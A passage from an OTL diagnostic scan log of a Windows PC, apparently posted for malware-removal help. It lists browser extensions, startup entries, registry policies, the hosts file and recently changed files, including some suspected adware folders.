(x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@myvr-software.com/npmMap,version=14.0.0.210: C:\Program Files (x86)\ERDAS\Image Web Server\Firefox Chrome 
Plug-in\npmMap.WebPlugin.Release.Win32.dll (Intergraph/myVR software AS) FF - HKLM\Software\MozillaPlugins\@photodex.com/PhotodexPresenter: C:\Program Files (x86)\Photodex Presenter\npPxPlay.dll ( ) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF - HKLM\Software\MozillaPlugins\adobe.com/AdobeAAMDetect: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll (Adobe Systems) FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\dkoloszc\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online) FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 33.1.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\msktbird@mcafee.com: C:\Program Files\McAfee\MSK [2014-02-04 13:34:08 | 000,000,000 | ---D | M] (No name found) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Extensions [2014-12-23 12:11:25 | 000,000,000 | ---D | M] (No name found) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions [2014-12-23 12:11:24 | 000,000,000 | ---D | M] (BuyuNssaeve) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions\aN@B.com [2014-12-23 12:11:25 | 000,000,000 | ---D | M] (YeoutubeAdBlocke) -- C:\Users\dkoloszc\AppData\Roaming\mozilla\Firefox\Profiles\cfd18su2.default\extensions\Oj@jEI.com [2014-11-26 12:34:08 | 000,000,000 | ---D | M] (No name 
found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions [2014-11-26 12:34:08 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [color=#E56717]========== Chrome ==========[/color] CHR - default_search_provider: (Enabled) CHR - default_search_provider: search_url = CHR - default_search_provider: suggest_url = CHR - homepage: http://www.google.pl/ CHR - plugin: Error reading preferences file CHR - Extension: Awesome Screenshot: Capture & Annotate = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\alelhddbbhepgpmgidjdcjakblofbmce\3.7.21_0\ CHR - Extension: Google Docs = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\ CHR - Extension: Google Drive = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\ CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5023_0\ CHR - Extension: YouTube = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\ CHR - Extension: Google Search = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\ CHR - Extension: Axure RP Extension for Chrome = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\dogkpdfcklifaemcdfbildhcofnopogp\0.6.2_0\ CHR - Extension: Cisco WebEx Extension = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlhmfgmfgeifomenelglieieghnjghma\1.0.1_0\ CHR - Extension: Google Wallet = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\ CHR - Extension: Gmail = C:\Users\dkoloszc\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\ O1 HOSTS File: ([2014-08-22 10:02:25 | 000,000,852 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts O1 - Hosts: 74.208.10.249 gs.apple.com O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) O2 - BHO: (WebEx Productivity Tools) - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC) O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) O3 - HKLM\..\Toolbar: (WebEx Productivity Tools) - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC) O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found. O4 - HKLM..\Run: [Adobe Creative Cloud] C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Systems Incorporated) O4 - HKLM..\Run: [DameWare MRC Agent] C:\Windows\SysWOW64\DWRCST.EXE (DameWare Development) O4 - HKLM..\Run: [Dell Webcam Central] C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe (Creative Technology Ltd) O4 - HKLM..\Run: [emsisoft anti-malware] c:\program files (x86)\emsisoft anti-malware\a2guard.exe (Emsisoft GmbH) O4 - HKLM..\Run: [IMSS] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IMSS\PIconStartup.exe (Intel Corporation) O4 - HKLM..\Run: [OfficeScanNT Monitor] C:\Program Files (x86)\Trend Micro\OfficeScan Client\pccntmon.exe (Trend Micro Inc.) 
O4 - HKLM..\Run: [Syncios device service] C:\Program Files (x86)\Syncios\SynciosDeviceService.exe () O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation) O4 - HKU\S-1-5-19..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-20..\Run: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe (Microsoft Corporation) O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [Akamai NetSession Interface] C:\Users\dkoloszc\AppData\Local\Akamai\netsession_win.exe (Akamai Technologies, Inc.) O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [CCleaner Monitoring] C:\Program Files\CCleaner\CCleaner64.exe (Piriform Ltd) O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [PTIM.exe] C:\Program Files (x86)\WebEx\Productivity Tools\PTIM.exe (Cisco WebEx LLC) O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [PTOneClick] C:\Program Files (x86)\WebEx\Productivity Tools\ptoneclk.exe (Cisco WebEx LLC) O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\Run: [RESTART_STICKY_NOTES] C:\Windows\System32\StikyNot.exe File not found O4 - HKU\S-1-5-19..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O4 - HKU\S-1-5-20..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe File not found O4 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919..\RunOnce: [Adobe Speed Launcher] 1419332630 File not found O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3 O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0 O6 - 
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0 O7 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145 O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.) O13 - gopher Prefix: missing O15 - HKU\S-1-5-21-29074177-2114273088-3454551869-225919\..Trusted Domains: intergraph.com ([siebweb] https in Trusted sites) O16 - DPF: {1A0D4CE0-0F53-4A04-AD6E-1B4F3D9285D8} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_Calendar.cab (Siebel Calendar) O16 - DPF: {3ED06114-4AE2-40E0-AFB5-EB93E9FB71EE} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Calendar.cab (Siebel Calendar) O16 - DPF: {4202FDF9-F479-4975-9359-7CA11CEF570A} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework) O16 - DPF: {4AAC6220-904F-40BD-B073-C1B8FB022156} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Calendar.cab (Siebel Calendar) O16 - DPF: {4CE60FE0-C7F9-4B9C-99AD-A9CF89A125E4} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus Notes) O16 - DPF: {88B13ADE-6D08-4744-B54A-465C433D0E45} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework) O16 - DPF: {8C244272-1DC1-4CE7-9C6C-FABCA09EB543} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_Desktop_Integration.cab (Siebel Desktop Integration) O16 - DPF: {B3FC07ED-8649-47A7-9F0B-F1DE12B64CCE} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_HI_Client.cab (Siebel High Interactivity Framework) O16 - DPF: {CECC827D-2E73-4786-B5AF-EF4FE1CAADED} https://siebweb.intergraph.com/service_enu/23030/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus 
Notes) O16 - DPF: {D5D66C38-36BF-4C81-8665-4B6250CECA0B} https://siebweb.intergraph.com/service_enu/23021/applets/SiebelAx_OutBound_mail.cab (Siebel Email Support for Microsoft Outlook and Lotus Notes) O16 - DPF: {E06E2E99-0AA1-11D4-ABA6-0060082AA75C} (Reg Error: Value error.) O16 - DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://juniper.net/dana-cached/sc/JuniperSetupClient.cab (JuniperSetupClientControl Class) O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 148.53.81.2 148.53.130.1 148.53.46.62 O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = ingrnet.com O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C428C679-148E-45A9-B58D-4C85283F4BE2}: DhcpNameServer = 148.53.81.2 148.53.130.1 148.53.46.62 O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E44A86FF-E81C-48AD-8DA7-30983FEA8539}: DhcpNameServer = 172.20.10.1 O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation) O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation) O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found. 
O32 - HKLM CDRom: AutoRun - 1 O32 - AutoRun File - [2014-05-29 08:52:05 | 000,000,000 | ---- | M] () - C:\autoexec.bat -- [ NTFS ] O34 - HKLM BootExecute: (autocheck autochk *) O35 - HKLM\..comfile [open] -- "%1" %* O35 - HKLM\..exefile [open] -- "%1" %* O37 - HKLM\...com [@ = comfile] -- "%1" %* O37 - HKLM\...exe [@ = exefile] -- "%1" %* O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3) O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2) O38 - SubSystems\\Windows: (ServerDll=sxssrv,4) [color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color] [2014-12-23 12:24:04 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe [2014-12-23 12:21:03 | 000,000,000 | ---D | C] -- C:\FRST [2014-12-23 12:20:27 | 002,122,240 | ---- | C] (Farbar) -- C:\Users\dkoloszc\Desktop\FRST64.exe [2014-12-23 10:35:50 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\eCyber [2014-12-23 10:06:02 | 000,000,000 | ---D | C] -- C:\ProgramData\Emsisoft [2014-12-23 09:34:38 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware [2014-12-23 09:34:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Emsisoft Anti-Malware [2014-12-22 09:00:11 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Smart Coupon [2014-12-22 08:59:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\YeoutubeAdBlocke [2014-12-22 08:59:29 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\BuyuNssaeve [2014-12-22 08:59:09 | 000,000,000 | ---D | C] -- C:\ProgramData\honnbmlkkhbafkhachmeccikobmajggh [2014-12-19 08:46:54 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll [2014-12-19 08:46:53 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll [2014-12-19 08:46:53 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll [2014-12-19 08:46:53 | 
000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll [2014-12-19 08:46:52 | 002,052,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl [2014-12-19 08:46:52 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll [2014-12-19 08:46:52 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll [2014-12-19 08:46:52 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll [2014-12-19 08:46:52 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe [2014-12-19 08:46:52 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll [2014-12-19 08:46:50 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll [2014-12-19 08:46:50 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll [2014-12-19 08:46:50 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll [2014-12-16 08:31:36 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\gtk-2.0 [2014-12-16 08:31:34 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\.thumbnails [2014-12-16 08:29:23 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\fontconfig [2014-12-16 08:29:21 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\gegl-0.2 [2014-12-16 08:29:21 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\.gimp-2.8 [2014-12-09 08:07:13 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\Documents\Axure [2014-12-09 08:06:59 | 000,000,000 | -H-D | C] -- C:\ProgramData\{5A486131-A1E7-499A-8212-A3213DF05557} [2014-12-09 08:06:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Axure [2014-12-09 08:06:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Axure [2014-12-08 09:23:04 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\Macromedia [2014-12-05 12:09:55 | 000,000,000 | ---D | C] -- 
C:\Users\dkoloszc\Desktop\Offline Vector Cache [2014-12-02 09:39:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Invisibility Ltd [2014-12-02 09:39:22 | 000,000,000 | ---D | C] -- C:\MagicPlusMini [2014-12-02 09:38:02 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RecordableActivator [2014-12-02 09:37:10 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Roaming\JWrapper-RecordableActivator [2014-11-26 12:34:16 | 000,000,000 | ---D | C] -- C:\Users\dkoloszc\AppData\Local\Mozilla [2014-11-26 12:34:09 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Maintenance Service [2014-11-26 12:34:09 | 000,000,000 | ---D | C] -- C:\ProgramData\Mozilla [2014-11-26 12:34:08 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox [2014-11-24 08:33:53 | 000,000,000 | -HSD | C] -- C:\Users\dkoloszc\AppData\Local\EmieBrowserModeList [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014-12-23 12:24:06 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\dkoloszc\Desktop\OTL.exe [2014-12-23 12:20:32 | 002,122,240 | ---- | M] (Farbar) -- C:\Users\dkoloszc\Desktop\FRST64.exe [2014-12-23 12:07:40 | 000,010,831 | ---- | M] () -- C:\Windows\cfgall.ini [2014-12-23 12:05:44 | 000,000,569 | ---- | M] () -- C:\Windows\SMSCFG.ini [2014-12-23 12:03:38 | 000,001,044 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job [2014-12-23 12:03:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2014-12-23 12:03:15 | 2073,096,191 | -HS- | M] () -- C:\hiberfil.sys [2014-12-23 11:52:01 | 000,000,544 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-29074177-2114273088-3454551869-225919.job [2014-12-23 11:43:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2014-12-23 11:37:00 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job [2014-12-23 11:02:28 | 
000,000,824 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk [2014-12-23 09:34:38 | 000,001,097 | ---- | M] () -- C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk [2014-12-23 09:20:04 | 002,173,952 | ---- | M] () -- C:\Users\dkoloszc\Desktop\AdwCleaner.exe [2014-12-22 08:15:43 | 000,008,294 | ---- | M] () -- C:\Users\dkoloszc\AppData\Local\recently-used.xbel [2014-12-18 10:10:01 | 000,001,298 | ---- | M] () -- C:\Users\dkoloszc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2010 Screen Clipper and Launcher.lnk [2014-12-16 12:39:28 | 000,334,062 | ---- | M] () -- C:\Users\dkoloszc\SplashScreen.scale-100.xcf [2014-12-16 12:27:28 | 000,587,981 | ---- | M] () -- C:\Users\dkoloszc\SplashScreen.scale-140.xcf [2014-12-15 09:48:40 | 000,001,178 | ---- | M] () -- C:\Users\Public\Desktop\paint.net.lnk [2014-12-15 09:46:02 | 049,336,498 | ---- | M] () -- C:\Users\dkoloszc\Desktop\GTDWS CI with MMW-20141211 1333-1.arf [2014-12-15 08:38:47 | 000,002,191 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk [2014-12-12 12:41:59 | 000,002,888 | RHS- | M] () -- C:\Users\dkoloszc\ntuser.pol [2014-12-10 11:43:11 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe [2014-12-10 11:43:11 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl [2014-12-09 08:08:20 | 000,000,032 | -H-- | M] () -- C:\Users\dkoloszc\AppData\Local\t70rc.dat [2014-12-09 08:06:58 | 000,001,094 | ---- | M] () -- C:\Users\Public\Desktop\Axure RP Pro 7.0.lnk [2014-12-05 12:54:16 | 000,000,028 | ---- | M] () -- C:\Windows\ODBC.INI [2014-12-01 14:59:38 | 000,787,106 | ---- | M] () -- C:\Users\dkoloszc\Desktop\GIS Days opis.pdf [2014-11-27 13:51:41 | 007,446,008 | ---- | M] (深圳创想天空科技有限公司) -- C:\Users\dkoloszc\Desktop\iTools.exe [2014-11-26 12:34:09 | 000,001,153 | ---- | M] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2014-11-25 15:44:22 | 000,026,831 | ---- | M] () -- 
C:\Users\dkoloszc\Desktop\localisation.xml [1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014-12-23 11:02:28 | 000,000,824 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk [2014-12-23 09:34:38 | 000,001,097 | ---- | C] () -- C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk [2014-12-23 09:19:59 | 002,173,952 | ---- | C] () -- C:\Users\dkoloszc\Desktop\AdwCleaner.exe [2014-12-22 08:15:43 | 000,008,294 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\recently-used.xbel [2014-12-16 12:39:28 | 000,334,062 | ---- | C] () -- C:\Users\dkoloszc\SplashScreen.scale-100.xcf [2014-12-16 12:27:28 | 000,587,981 | ---- | C] () -- C:\Users\dkoloszc\SplashScreen.scale-140.xcf [2014-12-16 08:29:02 | 000,000,896 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GIMP 2.lnk [2014-12-15 09:41:08 | 049,336,498 | ---- | C] () -- C:\Users\dkoloszc\Desktop\GTDWS CI with MMW-20141211 1333-1.arf [2014-12-09 08:06:58 | 000,001,094 | ---- | C] () -- C:\Users\Public\Desktop\Axure RP Pro 7.0.lnk [2014-12-05 12:54:16 | 000,000,028 | ---- | C] () -- C:\Windows\ODBC.INI [2014-12-01 14:59:37 | 000,787,106 | ---- | C] () -- C:\Users\dkoloszc\Desktop\GIS Days opis.pdf [2014-11-26 12:34:09 | 000,001,165 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [2014-11-26 12:34:09 | 000,001,153 | ---- | C] () -- C:\Users\Public\Desktop\Mozilla Firefox.lnk [2014-11-25 15:44:22 | 000,026,831 | ---- | C] () -- C:\Users\dkoloszc\Desktop\localisation.xml [2014-05-28 14:57:45 | 000,000,132 | ---- | C] () -- C:\Users\dkoloszc\AppData\Roaming\Adobe PNG Format CC Prefs [2014-05-07 14:02:17 | 000,001,456 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\Adobe Save for Web 13.0 Prefs [2014-03-12 15:29:43 | 000,000,032 | -H-- | C] () -- C:\Users\dkoloszc\AppData\Local\t70rc.dat [2014-02-24 08:57:02 | 000,002,888 | RHS- | C] () -- C:\Users\dkoloszc\ntuser.pol [2014-02-21 
10:37:34 | 000,143,836 | -H-- | C] () -- C:\Windows\SysWow64\mlfcache.dat [2014-02-07 09:40:41 | 000,003,584 | ---- | C] () -- C:\Users\dkoloszc\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2014-01-30 16:28:43 | 000,000,000 | ---- | C] () -- C:\Windows\HPMProp.INI [2014-01-22 13:27:08 | 000,010,831 | ---- | C] () -- C:\Windows\cfgall.ini [2014-01-22 12:20:28 | 000,000,569 | ---- | C] () -- C:\Windows\SMSCFG.ini [2014-01-22 11:53:49 | 000,016,724 | RHS- | C] () -- C:\ProgramData\ntuser.pol [2014-01-11 13:58:35 | 019,587,072 | ---- | C] () -- C:\Windows\SysWow64\igdfcl32.dll [2014-01-11 13:58:35 | 000,241,152 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll [2014-01-11 13:58:35 | 000,103,936 | ---- | C] () -- C:\Windows\SysWow64\igdail32.dll [2013-05-12 00:17:52 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll [color=#E56717]========== ZeroAccess Check ==========[/color] [2009-07-14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2014-03-25 03:43:12 | 014,175,744 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2014-03-25 03:09:54 | 012,874,240 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009-07-14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010-11-21 04:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009-07-14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check ==========[/color] [2014-05-28 11:25:37 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Amazing [2014-05-29 10:35:20 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Anvsoft [2014-03-12 15:29:41 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Axure [2014-02-25 08:56:11 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\Blueberry [2014-06-02 12:38:18 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\ColorCop [2014-12-23 10:35:50 | 000,000,000 | ---D | M] -- C:\Users\dkoloszc\AppData\Roaming\eCyber [2014-09-29 14:21:22 | 000,000,000 | ---D | M] -- 